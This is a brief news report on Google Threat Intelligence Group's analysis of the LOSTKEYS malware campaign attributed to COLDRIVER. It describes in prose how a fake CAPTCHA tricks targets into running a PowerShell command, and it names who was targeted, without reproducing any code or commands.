This post is also available in:
עברית (Hebrew)
A deceptive CAPTCHA prompt—familiar to most as the routine “I am not a robot” verification—has been repurposed as a gateway for cyber espionage. Security researchers have uncovered a sophisticated malware campaign using this everyday interface to infiltrate high-value targets.
Dubbed LOSTKEYS, the malware is part of a broader operation attributed to COLDRIVER, a state-sponsored Russian hacking group known for its persistent targeting of Western diplomats, military advisors, NGOs, and more. The operation was recently analyzed by Google’s Threat Intelligence Group (GTIG), which confirmed ongoing attacks as recently as April 2025.
The attack begins when a target is lured to a counterfeit website, often through a spear-phishing email. There, instead of validating human identity, the fake CAPTCHA interface initiates a deceptive technique called ClickFix. Victims are instructed to paste a seemingly harmless command—copied automatically to their clipboard—into the Windows Run dialog. Doing so launches a PowerShell script that activates the LOSTKEYS malware.
Once deployed, the malware scours the host system, seeking out files by type and location. Its objectives are clear: harvest credentials, extract emails, and siphon contact lists. In certain instances where greater access is required, COLDRIVER has been seen installing additional malware to deepen surveillance or exfiltrate files directly from compromised devices.
GTIG traced some samples of the malware back to December 2023, concealed within files mimicking tools like Maltego, a popular platform for open-source intelligence gathering.
The targeting profile is sharply defined. Individuals connected to Western governments, especially those advising on security or foreign policy, are frequent victims. NGOs and media professionals with ties to Ukraine or NATO are also in COLDRIVER’s sights.
Google has responded by disabling malicious domains and alerting affected Gmail and Workspace users. However, the emergence of LOSTKEYS underscores a growing trend: leveraging common interfaces and trusted workflows to bypass technical defenses and exploit human trust.
